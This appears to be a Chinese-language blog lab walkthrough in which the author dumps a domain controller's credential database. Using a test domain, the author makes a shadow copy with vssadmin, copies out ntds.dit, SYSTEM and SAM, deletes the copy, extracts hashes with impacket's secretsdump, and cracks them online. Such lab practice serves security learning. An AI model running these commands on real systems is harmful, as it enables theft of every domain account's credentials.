把昨天发的vssadmin获取ntds数据库的文章实际操作了一下
    这里使用的是God.org单域环境(更新1),我的目的只是实操vssadmin所以不搞的太复杂
    vssadmin获取NTDS实操 - 图1
    下载、解压、打开虚拟机(开机密码在描述里)
    打开终端执行命令看一下list

    1. vssadmin list shadows

    vssadmin获取NTDS实操 - 图2
    然后创建一个快照

    vssadmin create shadow /for=c:
    

    vssadmin获取NTDS实操 - 图3
    将NTDS和system文件复制出来
    我这里也将sam也一起复制出来,方便后续顺便对比一下sam中的hash

    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit c:\ntds.dit
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM c:\system.hiv
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM c:\sam.hiv
    

    vssadmin获取NTDS实操 - 图4
    可以看到C盘下已经有我复制出来的3个文件了
    vssadmin获取NTDS实操 - 图5
    记得把快照删掉

    vssadmin delete shadows /for=c: /quiet
    

    vssadmin获取NTDS实操 - 图6
    将3个文件复制到本地
    然后从https://github.com/SecureAuthCorp/impacket 把项目下载下来,我们只需要其中的\impacket-master\examples\secretsdump.py文件,将其与其它3个文件放一起方便操作。
    vssadmin获取NTDS实操 - 图7
    然后终端打开到这个目录,然后输入以下命令解码
    ps:如果出现:ImportError: No module named impacket报错,那就pip install impacket就好

    py -2 secretsdump.py -system system.hiv -ntds ntds.dit local
    

    ps:我这里是本地装了多个python版本,所以是py -2。
    等待一下之后会出现解出来的信息
    vssadmin获取NTDS实操 - 图8
    我们把hash拿去cmd5解一下,解出来可以看到密码
    vssadmin获取NTDS实操 - 图9
    我们再来试试解sam,将下面3个文件放一起,方便操作
    vssadmin获取NTDS实操 - 图10
    输入以下命令,但是啥都没解出来,这里先占个坑,日后研究研究与dump lsass内存的方式获取本地密码有何不同。

    lsadump::sam /system:system.hiv /sam:sam.hiv
    

    vssadmin获取NTDS实操 - 图11